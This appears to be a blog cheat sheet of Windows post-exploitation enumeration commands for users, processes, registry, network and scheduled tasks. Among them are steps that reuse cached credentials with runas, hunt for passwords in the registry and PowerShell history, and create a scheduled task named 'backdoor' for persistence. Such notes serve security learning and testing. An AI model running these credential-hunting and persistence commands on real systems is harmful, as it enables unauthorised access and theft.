General system enumeration
Get general information about the OS:
systeminfo
Get the environment variabes:
set
Enumerate cached credentials:
cmdkey /list
- If there is an application listed, try to use
runasto run a command with the stored credentials.runas /savecred /user:WORKGROUP\Administrator "\10.10.10.10\share"
If the current system is not known yet, try to determine the version via one of the following files:
- C:\windows\system32\eula.txt (XP)
- C:\boot.ini
- C:\Windows\System32\License.rtf
- C:\ProgramData\Microsoft\Diagnosis\osver.txt (Win10)
Processes enumeration
tasklist /V
tasklist /V | find "cmd.exe" // Search for a command
tasklist /V /fi "USERNAME eq NT AUTHORITY\SYSTEM" /fi "STATUS eq running" // List all SYSTEM processes
taskkill /PID $pid // Kill a process
PS> Get-Process
PS> Get-CimInstance Win32_Process | Select-Object ProcessId, Name, CommandLine // Returns also the path of the processes!
PS> Get-CimInstance Win32_Process | Where-Object { $_.CommandLine -match "VeryInterestingProcess" } | Select-Object ProcessId, Name, CommandLine // Search for a specific name
Determine the parent process in two steps:
wmic process where (ProcessId=7668) get parentprocessid // Get the parent process id
wmic process where (ProcessId=7148) get executablepath // Get the executable name from the parent process
Alternative with SysinternalTools:
pslist /accepteula -t
User and group enumeration
Check the users current privileges and groups:
whoami /all
Enumerate all users
net users
net user $username // get details for each user
PS> Get-LocalUser
Enumerate all groups
net localgroup
PS> Get-LocalGroup
Get all members of a group
net localgroup $group
PS> Get-LocalGroupMember $group
File system enumeration
Determine all drives:
fsutil fsinfo drives
Determine the type of a drive:
fsutil fsinfo drivetype Z:
Get general information about a drive:
fsutil fsinfo volumeinfo C:
Scheduled tasks enumeration
Show all scheduled tasks. NOTE: You need to add the Folder to subsequent commands here, if the task is not in the root folder!
schtasks /Query
schtasks /query /fo LIST /v
schtasks /query /fo CSV /v | findstr /I "admin" // Use this to filter the output for an interesting user, path, etc.
If there is a task you can execute and change the binary (check with icacls), then binary hijacking could be possible here.
Create a new task named backdoor, which executed at a fixed time:
schtasks /create /sc weekly /d mon /tn backdoor /tr C:\s32.exe /st 23:00
Create a new task named backdoor, which executed when a user logs in:
schtasks /Create /TR s32.exe /RU $username /TN backdoor /SC ONLOGON /IT
Confirm that the task was created correctly:
schtasks /query /TN backdoor /fo LIST /V
Delete the task backdoor:
schtasks /delete /tn backdoor
Execute the task backdoor now:
schtasks /Run /TN backdoor
Registry enumeration
Get some installed software:
reg query "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
PS> Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall*" | select displayname
PS> Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall*" | select displayname
See the Registry post for more.
Search for passwords:
reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
Search for usernames! For example, check if there is something about an interesting user in the registry.
Network enumeration
IPs
ipconfig
List all network shares
net share
List the routing table
route print
netstat -ano
Extended enumeration
- Check PowerShell history file:
ConsoleHost_history.txt(inAppData/Roaming/Microsoft/Windows/PowerShell/PSReadLine) - Upload SysinternalSuite. Then:
- Enumerate installed software:
PsInfo64.exe /accepteula -s
- Enumerate installed software:
Leave a Reply
You must be logged in to post a comment.